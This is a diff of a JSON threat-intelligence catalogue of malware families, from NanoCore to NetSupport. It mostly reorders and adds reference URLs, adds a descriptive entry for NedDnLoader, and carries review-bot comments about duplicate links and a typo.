+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat",
+ "https://zero2auto.com/2020/06/07/dealing-with-obfuscated-macros/",
+ "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
+ "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
+ "https://www.ic3.gov/media/news/2020/200917-1.pdf",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html",
+ "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
+ "https://medium.com/@M3HS1N/malware-analysis-nanocore-rat-6cae8c6df918",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://blog.morphisec.com/syk-crypter-discord",
+ "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html",
+ "https://medium.com/@the_abjuri5t/nanocore-rat-hunting-guide-cb185473c1e0",
+ "https://malwareindepth.com/defeating-nanocore-and-cypherit/",
+ "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://mp.weixin.qq.com/s/mstwBMkS0G3Et4GOji2mwA",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52",
+ "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/image-file-trickery-part-ii-fake-icon-delivers-nanocore/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/elfin-indictments-iran-espionage",
+ "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/",
+ "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-spoofs-philippine-government-covid-19-health-data-widespread",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
+ "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire"
 ],
 "synonyms": [
 "Nancrat",
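Review bot: The regenerated NanoCore `refs` list keeps the same article more than once in different spellings: `https://medium.com/@mariohenkel/decrypting-nanocore-config-and-dump-all-plugins-f4944bfaba52?sk=00be46bc5bf99e8ab67369152ceb0332` next to the same URL without the `?sk=` parameter, and `https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage` next to `https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage`. The same pattern recurs in the Necurs hunk (`gold-riverview` under both `http://` and `https://`, and `blog.intel471.com/2020/05/21/a-brief-history-of-ta505/` alongside `intel471.com/blog/a-brief-history-of-ta505`) and in the Nemty hunk (both `tesorion.nl` forms of `nemty-update-decryptors-for-nemty-1-5-and-1-6`). Normalizing URLs before emission (strip `?sk=` and `utm_*` tracking parameters, prefer the `https://` form) and de-duplicating would keep these lists clean; the `?sk=` value in particular looks like a Medium share token and has no place in a published dataset.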
@@ -35053,8 +36663,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam",
- "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html",
- "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage"
+ "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage",
+ "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html"
 ],
 "synonyms": [],
 "type": []
@@ -35067,9 +36677,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus",
- "https://www.secureworks.com/research/threat-profiles/iron-hunter",
 "https://www.ncsc.gov.uk/alerts/turla-group-malware",
- "https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims"
+ "https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims",
+ "https://www.secureworks.com/research/threat-profiles/iron-hunter"
 ],
 "synonyms": [],
 "type": []
@@ -35083,9 +36693,9 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat",
 "https://norfolkinfosec.com/how-to-analyzing-a-malicious-hangul-word-processor-document-from-a-dprk-threat-actor-group/",
- "https://www.youtube.com/watch?v=rfzmHjZX70s",
- "https://blog.talosintelligence.com/2018/05/navrat.html?m=1",
 "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
+ "https://blog.talosintelligence.com/2018/05/navrat.html?m=1",
+ "https://www.youtube.com/watch?v=rfzmHjZX70s",
 "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf"
 ],
 "synonyms": [
@@ -35101,14 +36711,14 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ncctrojan",
- "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
- "https://www.youtube.com/watch?v=1WfPlgtfWnQ",
 "https://insight-jp.nttsecurity.com/post/102gr6l/ta428ncctrojan",
- "https://sebdraven.medium.com/actor-behind-operation-lagtime-targets-russia-f8c277dc52a9",
+ "https://www.youtube.com/watch?v=1WfPlgtfWnQ",
 "https://vblocalhost.com/uploads/VB2020-20.pdf",
 "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf",
+ "https://sebdraven.medium.com/actor-behind-operation-lagtime-targets-russia-f8c277dc52a9",
 "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/",
- "https://twitter.com/ESETresearch/status/1441139057682104325?s=20"
+ "https://twitter.com/ESETresearch/status/1441139057682104325?s=20",
+ "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -35121,11 +36731,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nebulae",
- "https://www.bleepingcomputer.com/news/security/cyberspies-target-military-organizations-with-new-nebulae-backdoor/",
 "https://www.securityweek.com/chinese-cyberspies-target-military-organizations-asia-new-malware",
 "https://twitter.com/SyscallE/status/1390339497804636166",
- "https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf",
- "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos"
+ "https://www.bleepingcomputer.com/news/security/cyberspies-target-military-organizations-with-new-nebulae-backdoor/",
+ "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -35138,27 +36748,27 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs",
- "https://blogs.microsoft.com/on-the-issues/2020/03/10/necurs-botnet-cyber-crime-disrupt/",
- "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
- "http://blog.talosintelligence.com/2017/03/necurs-diversifies.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/",
- "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf",
- "http://www.secureworks.com/research/threat-profiles/gold-riverview",
- "https://bin.re/blog/the-dgas-of-necurs/",
- "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors",
- "https://www.secureworks.com/research/threat-profiles/gold-riverview",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
- "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/",
 "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
- "https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
 "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/",
- "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features"
+ "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors",
+ "http://blog.talosintelligence.com/2017/03/necurs-diversifies.html",
+ "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/",
+ "https://blogs.microsoft.com/on-the-issues/2020/03/10/necurs-botnet-cyber-crime-disrupt/",
+ "https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/",
+ "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features",
+ "http://www.secureworks.com/research/threat-profiles/gold-riverview",
+ "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/",
+ "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/",
+ "https://www.secureworks.com/research/threat-profiles/gold-riverview",
+ "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://bin.re/blog/the-dgas-of-necurs/"
 ],
 "synonyms": [
 "nucurs"
@@ -35169,12 +36779,17 @@
 "value": "Necurs"
 },
 {
- "description": "",
+ "description": "NedDnLoader is an HTTP(S) downloader that uses AES for C&C trafic encryption.\r\n\r\nIt sends detailed information about the victim's environment, like computer name, user name, type and free disk space of all drives, and a list of currently running processes. It uses three typical parameter names for HTTP POST requests: ned, gl, hl. The usual payload downloaded with NedDnLoader is Torisma.\r\n\r\nThe internal DLL name of NedDnLoader is usually Dn.dll, Dn64.dll or DnDll.dll. It is deployed either as a standalone payload or within a trojanized MFC application project. It contains specific RTTI symbols like \".?AVCWininet_Protocol@@\" or \".?AVCMFC_DLLApp@@\".",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.neddnloader",
+ "https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/",
+ "https://www.telsy.com/lazarus-gate/",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf"
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/"
 ],
 "synonyms": [],
 "type": []
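Review bot: The new `description` for win.neddnloader carries a typo, `C&C trafic encryption` should read `C&C traffic encryption`. The text appears to be imported from the Malpedia entry linked first in `refs`, so the correction is best made upstream as well, otherwise the next refresh will reintroduce it. The rest of the description (the `ned`, `gl`, `hl` POST parameter names, the `Dn.dll`/`Dn64.dll`/`DnDll.dll` internal names and the RTTI symbols) is useful detection context and reads fine.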
@@ -35187,35 +36802,35 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry",
- "https://news.sophos.com/en-us/2021/01/26/nefilim-ransomware-attack-uses-ghost-credentials/",
- "https://www.trendmicro.com/en_us/research/21/b/nefilim-ransomware.html",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
- "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
- "https://blog.qualys.com/vulnerabilities-research/2021/05/12/nefilim-ransomware",
- "https://www.bleepingcomputer.com/news/security/home-appliance-giant-whirlpool-hit-in-nefilim-ransomware-attack/",
- "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://securelist.com/evolution-of-jsworm-ransomware/102428/",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://documents.trendmicro.com/assets/white_papers/wp-modern-ransomwares-double-extortion-tactics.pdf",
 "https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot",
+ "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://www.trendmicro.com/en_us/research/21/b/nefilim-ransomware.html",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://id-ransomware.blogspot.com/2020/03/nefilim-ransomware.html",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
 "https://www.trendmicro.com/en_us/research/21/f/nefilim-modern-ransomware-attack-story.html",
- "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
+ "http://www.secureworks.com/research/threat-profiles/gold-mansard",
 "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
 "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/nefilim-ransomware-threatens-to-expose-stolen-data",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
- "http://www.secureworks.com/research/threat-profiles/gold-mansard",
 "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
- "https://id-ransomware.blogspot.com/2020/03/nefilim-ransomware.html",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/",
- "https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/",
 "https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks",
- "https://securelist.com/evolution-of-jsworm-ransomware/102428/",
- "https://documents.trendmicro.com/assets/white_papers/wp-modern-ransomwares-double-extortion-tactics.pdf"
+ "https://news.sophos.com/en-us/2021/01/26/nefilim-ransomware-attack-uses-ghost-credentials/",
+ "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html",
+ "https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/",
+ "https://blog.qualys.com/vulnerabilities-research/2021/05/12/nefilim-ransomware",
+ "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://www.bleepingcomputer.com/news/security/home-appliance-giant-whirlpool-hit-in-nefilim-ransomware-attack/",
+ "https://us-cert.cisa.gov/ncas/alerts/aa20-345a"
 ],
 "synonyms": [
 "Nephilim"
@@ -35230,7 +36845,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemesis",
- "https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor"
+ "https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor",
+ "https://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5"
 ],
 "synonyms": [
 "Project Nemesis"
@@ -35261,33 +36877,33 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://www.bleepingcomputer.com/news/security/nemty-ransomware-gets-distribution-from-rig-exploit-kit/",
- "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/",
- "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://github.com/albertzsigovits/malware-notes/blob/master/Nemty.md",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html",
- "https://www.bleepingcomputer.com/news/security/fake-paypal-site-spreads-nemty-ransomware/",
- "http://www.secureworks.com/research/threat-profiles/gold-mansard",
- "https://www.bleepingcomputer.com/news/security/nemty-ransomware-decryptor-released-recover-files-for-free/",
- "https://www.sentinelone.com/labs/karma-ransomware-an-emerging-threat-with-a-hint-of-nemty-pedigree/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet",
- "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-08-24-nemty-ransomware-notes.vk.raw",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/",
- "https://www.tesorion.nl/nemty-update-decryptors-for-nemty-1-5-and-1-6/",
- "https://medium.com/csis-techblog/the-nemty-affiliate-model-13f5cf7ab66b",
 "https://securelist.com/evolution-of-jsworm-ransomware/102428/",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://www.tesorion.nl/nemty-update-decryptors-for-nemty-1-5-and-1-6/",
+ "https://www.tesorion.nl/en/posts/nemty-update-decryptors-for-nemty-1-5-and-1-6/",
+ "https://github.com/albertzsigovits/malware-notes/blob/master/Nemty.md",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/",
+ "http://www.secureworks.com/research/threat-profiles/gold-mansard",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/",
+ "https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/",
+ "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-08-24-nemty-ransomware-notes.vk.raw",
+ "https://www.bleepingcomputer.com/news/security/nemty-ransomware-decryptor-released-recover-files-for-free/",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://www.sentinelone.com/labs/karma-ransomware-an-emerging-threat-with-a-hint-of-nemty-pedigree/",
+ "https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html",
+ "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/",
+ "https://www.bleepingcomputer.com/news/security/nemty-ransomware-gets-distribution-from-rig-exploit-kit/",
+ "https://medium.com/csis-techblog/the-nemty-affiliate-model-13f5cf7ab66b",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
 "https://www.bleepingcomputer.com/news/security/new-nemty-ransomware-may-spread-via-compromised-rdp-connections/",
- "https://www.tesorion.nl/en/posts/nemty-update-decryptors-for-nemty-1-5-and-1-6/"
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/",
+ "https://www.bleepingcomputer.com/news/security/fake-paypal-site-spreads-nemty-ransomware/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -35313,10 +36929,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.neshta",
- "https://www.virusbulletin.com/virusbulletin/2014/08/bird-s-nest",
- "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
 "https://threatvector.cylance.com/en_us/home/threat-spotlight-neshta-file-infector-endures.html",
- "https://www.virusradar.com/en/Win32_Neshta.A/description"
+ "https://www.virusbulletin.com/virusbulletin/2014/08/bird-s-nest",
+ "https://www.virusradar.com/en/Win32_Neshta.A/description",
+ "https://www.mandiant.com/resources/pe-file-infecting-malware-ot"
 ],
 "synonyms": [],
 "type": []
@@ -35329,11 +36945,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.nestegg",
- "https://youtu.be/_kzFNQySEMw?t=789",
+ "https://securelist.com/lazarus-under-the-hood/77908/",
 "https://www.documentcloud.org/documents/4834259-Park-Jin-Hyok-Complaint.html",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180231/LazarusUnderTheHood_PDF_final_for_securelist.pdf",
+ "https://content.fireeye.com/apt/rpt-apt38",
 "https://youtu.be/8hJyLkLHH8Q?t=1208",
- "https://content.fireeye.com/apt/rpt-apt38"
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180231/LazarusUnderTheHood_PDF_final_for_securelist.pdf",
+ "https://youtu.be/_kzFNQySEMw?t=789"
 ],
 "synonyms": [],
 "type": []
@@ -35372,9 +36989,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle",
- "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/",
 "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/"
+ "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf"
 ],
 "synonyms": [
 "Neteagle_Scout",
@@ -35390,13 +37007,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.netfilter",
- "https://www.bitdefender.com/files/News/CaseStudies/study/405/Bitdefender-DT-Whitepaper-Fivesys-creat5699-en-EN.pdf",
- "https://www.gdatasoftware.com/blog/microsoft-signed-a-malicious-netfilter-rootkit",
+ "https://blog.360totalsecurity.com/en/netfilter-rootkit-ii-continues-to-hold-whql-signatures/",
 "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html",
- "https://www.vice.com/en/article/pkbzxv/hackers-tricked-microsoft-into-certifying-malware-that-could-spy-on-users",
- "https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/",
+ "https://www.gdatasoftware.com/blog/microsoft-signed-a-malicious-netfilter-rootkit",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/405/Bitdefender-DT-Whitepaper-Fivesys-creat5699-en-EN.pdf",
 "https://www.intezer.com/blog/malware-analysis/fast-insights-for-a-microsoft-signed-netfilter-rootkit/",
- "https://blog.360totalsecurity.com/en/netfilter-rootkit-ii-continues-to-hold-whql-signatures/"
+ "https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/",
+ "https://www.vice.com/en/article/pkbzxv/hackers-tricked-microsoft-into-certifying-malware-that-could-spy-on-users"
 ],
 "synonyms": [],
 "type": []
@@ -35448,19 +37065,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat", - "https://asec.ahnlab.com/en/45312/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/", - "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee", - "https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html", - "https://www.bleepingcomputer.com/news/security/malicious-web-redirect-service-infects-16-500-sites-to-push-malware/", - "https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html", - "https://www.esentire.com/blog/fake-chrome-setup-leads-to-netsupportmanager-rat-and-mars-stealer", "https://www.trendmicro.com/en_us/research/23/c/new-opcjacker-malware-distributed-via-fake-vpn-malvertising.html", - "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/", "https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/", + "https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html", + "https://asec.ahnlab.com/en/45312/", + "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee", + "http://www.netsupportmanager.com/index.asp", "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", - "http://www.netsupportmanager.com/index.asp" + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/", + "https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/", + 
